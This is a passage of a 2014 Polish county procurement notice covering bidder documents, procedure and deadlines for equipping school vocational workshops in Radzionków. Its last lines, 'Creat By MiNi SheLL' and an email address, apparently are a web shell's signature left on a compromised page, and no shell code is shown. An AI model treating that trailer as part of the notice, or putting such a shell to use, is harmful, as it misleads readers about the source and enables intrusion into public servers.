<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w punkcie III.4.3.1, zastępuje się je dokumentem, zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego, odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub przed notariuszem. Termin ważności dokumentów analogicznie jak w punkcie III.4.2.
2. Wykonawca składa wraz z ofertą oświadczenie o spełnieniu warunków udziału w postępowaniu - oświadczenie w trybie art. 22 ust. 1 ustawy (załącznik nr 2 do SIWZ) i oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust.1 ustawy (załącznik nr 3 do SIWZ). W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców przedmiotowe oświadczenia mogą być złożone wspólnie i podpisane przez upoważnionych przedstawicieli każdego z tych Wykonawców, lub przez Pełnomocnika upoważnionego do reprezentowania w postępowaniu wykonawców wspólnie ubiegających się o udzielenie zamówienia lub reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
3. Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia na podstawie oświadczeń i dokumentów złożonych przez Wykonawcę wraz z ofertą, z zastrzeżeniem art. 26, ust. 3 ustawy.
4. Wykonawca jest zobowiązany wykazać nie później niż na dzień składania ofert, spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy i braku podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy.
5. Kompletna oferta powinna zawierać:
1) Formularz ofertowy, sporządzony na podstawie wzoru stanowiącego załącznik nr 1 do SIWZ.
2) Stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru lub innych dokumentów złożonych wraz z ofertą.
3) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego.
4) Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej.
5) Aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
6) Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
7) Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu - Oświadczenie w trybie art. 22, ust.1 ustawy sporządzone na podstawie wzoru stanowiącego załącznik nr 2 do SIWZ.
8) Oświadczenie Wykonawcy o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24, ust.1 ustawy sporządzone na podstawie wzoru stanowiącego załącznik nr 3 do SIWZ.
9) Oświadczenie o podwykonawstwie, według wzoru stanowiącego załącznik nr 4 do SIWZ. Brak oświadczenia będzie równoznaczne z wykonaniem przedmiotu zamówienia bez udziału podwykonawców.
10) Parafowaną lub podpisaną treść istotnych postanowień umowy wraz z załącznikami, stanowiącą załącznik nr 7a lub/i 7b lub/i 7c do SIWZ ( w zależności od części zamówienia na jaką Wykonawca składa ofertę).
11) Listę podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. 2007, nr 50, poz. 331 z późn. zm.) albo informację o tym, że Wykonawca nie należy do grupy kapitałowej - zgodnie z załącznikiem nr 6 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zgodnie z art. 144, ust. 1 ustawy Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy na skutek okoliczności, które powodują, że zmiany będą konieczne z punktu widzenia interesów Wykonawcy lub Zamawiającego  w szczególności w zakresie:
1) Zmiany terminu wykonania zamówienia spowodowanych przyczynami leżącymi poza Wykonawcą i Zamawiającym w szczególności wystąpieniem siły wyższej. Pod pojęciem siły wyższej Zamawiający rozumie okoliczności, które pomimo zachowania należytej staranności są nieprzewidywalne oraz którym nie można zapobiec lub przeciwstawić się skutecznie.
2) Zmiany danych zarówno po stronie Zamawiającego jak i Wykonawcy w sytuacji gdy w trakcie obowiązywania umowy zaistnieją takie zmiany.
3) Zmiany terminu wykonania zamówienia spowodowanego chwilowymi brakami magazynowymi powyżej 14 dni.
4) Innym niż wymienione wyżej z zastrzeżeniem art. 140 ust. 3 ustawy.
2. Zmiany postanowień umowy będą zawarte w postaci aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.tarnogorski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Organizacyjny Starostwa Powiatowego w Tarnowskich Górach, pokój nr 114 lub po otrzymaniu pisemnego wniosku o jej przekazanie. SIWZ jest bezpatna.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.04.2014 godzina 09:30, miejsce: Zamkniętą kopertę należy złożyć w budynku Starostwa Powiatowego w Tarnowskich Górach, przy u. Karłuszowiec 5 (kancelaria - pokój nr 1).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Przedmiotem zamówienia jest doposażenie dwóch pracowni praktycznej nauki zawodu oraz zakup materiałów dydaktycznych w Zespole Szkół Techniczno - Humanistycznych w Radzionkowie. Przedmiot zamówienia realizowany jest w ramach projektu systemowego pn. Mam zawód - mam pracę w regionie, który jest współfinansowany przez Powiat Tarnogórski, Budżet Państwa oraz Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego Programu Operacyjnego Kapitał Ludzki 2007-2013. Doposażenie pracowni szkolnych oraz zakup materiałów dydaktycznych w szkołach biorących udział w projekcie jest jedną z form wsparcia w ramach projektu systemowego pn. Mam zawód - mam pracę w regionie, który jest współfinansowany ze środków Europejskiego Funduszu Spoecznego, budżetu Państwa oraz budżetu Powiatu Tarnogórskiego, w ramach działania 9.2 Programu Operacyjnego Kapitał Ludzki. Wartość całego zadania pn. doposażenie pracowni w szkołach wynosi 411.418,00 zł, natomiast wartość całego zadania pn. Zakup materiałów dydatycznych dla szkół biorących udział w projekcie wynosi 170.000,00 zł. Szacunkowa wartość niniejszego zamówienia wynosi: na część A - 44.552,85 zł netto, na część B - 3.658,54 zł netto, na część C - 8.130,08 zł netto.
2. Zamówienie zostanie zrealizowane w terminie:
Część A: do 14 dni kalendarzowych od daty podpisania umowy przez Zamawiającego i Wykonawcę, Część B: do 14 dni kalendarzowych od daty podpisania umowy przez Zamawiającego i Wykonawcę, Część C: do 14 dni kalendarzowych od daty podpisania umowy przez Zamawiającego i Wykonawcę.
3. Zgodnie z art. 22 ust. 1 ustawy o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2) posiadania wiedzy i doświadczenia;
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia; 
4) sytuacji ekonomicznej i finansowej.
4. Zamawiający dopuszcza składanie ofert częściowych na część A i/lub część B i/lub część C.
5. Zamawiający nie przewiduje zawarcia umowy ramowej.
6. Zamawiający nie przewiduje udzielania zamówień uzupełniających, o których mowa w art. 67, ust. 1 pkt 7 ustawy.
7. Zamawiający dopuszcza  składanie ofert równoważnych, jednak oferowany przedmiot zamówienia musi być o parametrach i standardzie nie gorszym niż podane w SIWZ. Udowodnienie, iż oferowany przedmiot zamówienia spełnia warunki równoważności leży po stronie Wykonawcy.  
8. Zamawiający nie przewiduje rozliczenia w walutach obcych. Rozliczenia między Zamawiającym, a Wykonawcą prowadzone są w walucie PLN.
9. Zamawiający nie przewiduje aukcji elektronicznej.
10. Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu za wyjątkiem regulacji art. 93 ust.4 ustawy.
11. Zamawiający nie przewiduje wymagań, o których mowa w art. 29, ust. 4 ustawy.
12. Zamawiający nie ustanawia dynamicznego systemu zakupów.
13. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy. W ofercie Wykonawca winien wskazać części zamówienia, których wykonanie powierzy podwykonawcom, zgodnie z załącznikiem nr 4 do SIWZ. Brak powyższej informacji oznaczać będzie, że całość zamówienia zostanie zrealizowana przez Wykonawcę bez udziału podwykonawców.
14. Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę prac związanych z rozmieszczeniem i instalacją. 
15. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W tym przypadku ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wykonawcy Ci przed podpisaniem umowy w sprawie zamówienia publicznego będą zobowiązani do przedstawienia umowy określającej ich współpracę.
16. Treść oferty musi odpowiadać treści SIWZ.
17. Wszystkie załączniki są integralną częścią SIWZ.
18. Postępowanie prowadzone jest w formie pisemnej w języku polskim. Dokumenty, wnioski, zawiadomienia oraz informacje przekazywane za pomocą telefaksu lub drogą elektroniczną uważa się za złożone w terminie, jeżeli ich treść dotarła do adresata przed upływem terminu i została niezwłocznie potwierdzona pismem przesłanym za pośrednictwem poczty lub złożonym w Kancelarii Starostwa Powiatowego w Tarnowskich Górach.
19. Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy.
20. Wspólny Słownik Zamówień (CPV): 31.20.00.00-8, 44.53.15.10-9, 32.32.46.00-6, 30.20.00.00-1, 32.32.20.00-6, 32.32.20.00-6, 38.41.00.00-2, 38.65.21.00-1, 30.21.30.00-5, 30.23.00.00-0, 39.16.21.00-6, 39.16.20.00-5, 39.16.21.10-9, 48.00.00.00-8, 48.19.00.00-6 
21. Wyjaśnienia udzielają: w kwestiach formalnych - Agata Mateja - inspektor w Wydziale Organizacyjnym - tel. (+48 32) 381-37-86, w kwestiach merytorycznych - Dariusz Bąk - inspektor w Wydziale Strategii, Promocji i Sportu, tel. (+48 32) 381-84-71.
22. Otwarcie ofert nastąpi w Starostwie Powiatowym w Tarnowskich Górach, przy ul. Karłuszowiec 5 w dniu 2 kwietnia 2014 r. o godz. 10.15.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com